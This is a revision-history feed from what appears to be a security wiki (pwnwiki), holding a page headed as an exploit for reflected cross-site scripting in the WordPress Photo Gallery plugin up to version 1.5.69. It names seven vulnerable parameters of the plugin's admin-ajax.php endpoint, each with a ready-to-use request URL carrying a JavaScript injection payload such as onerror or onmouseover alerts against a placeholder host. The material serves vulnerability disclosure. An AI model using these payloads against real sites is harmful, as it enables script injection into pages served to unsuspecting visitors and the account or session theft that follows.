https://pwnwiki.com/index.php?action=history&feed=atom&title=WordPress_Photo_Gallery_1.5.69_%E8%B7%A8%E7%AB%99%E8%85%B3%E6%9C%AC%E6%BC%8F%E6%B4%9E
WordPress Photo Gallery 1.5.69 跨站腳本漏洞 - Revision history
2026-04-10T00:11:36Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=WordPress_Photo_Gallery_1.5.69_%E8%B7%A8%E7%AB%99%E8%85%B3%E6%9C%AC%E6%BC%8F%E6%B4%9E&diff=1747&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> WordPress Photo Gallery 1.5.69 Cross Site Scripting Vulnerability Researcher Name: ThuraMoeMyint Twitter: https://twitter.com/mgthuramoemyint Vendor Url: https:/..."
2021-04-20T03:09:37Z
<p>Created page with "==EXP== <pre> WordPress Photo Gallery 1.5.69 Cross Site Scripting Vulnerability Researcher Name: ThuraMoeMyint Twitter: https://twitter.com/mgthuramoemyint Vendor Url: https:/..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
WordPress Photo Gallery 1.5.69 Cross Site Scripting Vulnerability<br />
Researcher Name: ThuraMoeMyint<br />
Twitter: https://twitter.com/mgthuramoemyint<br />
Vendor Url: https://wordpress.org/plugins/photo-gallery/<br />
<br />
"Photo Gallery by 10Web / Mobile-Friendly Image Gallery" (photo-gallery) Multiple RXSS<br />
<br />
The parameter bwg_album_breadcrumb_0 is able to inject malicious javascript code.<br />
Affected Version < 1.5.68<br />
<br />
vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&bwg_album_breadcrumb_0=[{"id":"1'><img/src=x onerror=alert(1)>","page":1},{"id":"1","page":1}]&gallery_type=album_extended_preview<br />
<br />
The parameter "shortcode_id" is able to inject malicious javascript.<br />
Affected Version < 1.5.68<br />
<br />
vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&gallery_type=image_browser&gallery_id=5&tag=0&album_id=0&theme_id=1&shortcode_id=9%22%20onmouseover=alert(id)//<br />
<br />
The parameter "album_gallery_id_0" is able to inject malicious javascript.<br />
Affected Version <= 1.5.68<br />
<br />
vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&album_gallery_id_0=%27);}%20alert(1);//<br />
<br />
The parameter "bwg_album_search_0" is able to inject malicious javascript.<br />
Affected Version <= 1.5.68<br />
<br />
vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&bwg_album_search_0=%22%20autofocus%20onfocus%3D%22alert(1)<br />
<br />
The parameter "tag" is able to inject malicious javascript.<br />
Affected Version <= 1.5.68<br />
<br />
vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&tag=%22%20onmouseover=alert(1)%3E<br />
<br />
The parameter "type_0" is able to inject malicious javascript.<br />
Affected Version <= 1.5.68<br />
<br />
vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&type_0=%27);}%20alert(document.domain);//<br />
<br />
The parameter "theme_id" is able to inject malicious javascript.<br />
Affected Version <= 1.5.69<br />
<br />
vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&theme_id=%22%20onmouseover=alert(1)%3E<br />
</pre></div>
Pwnwiki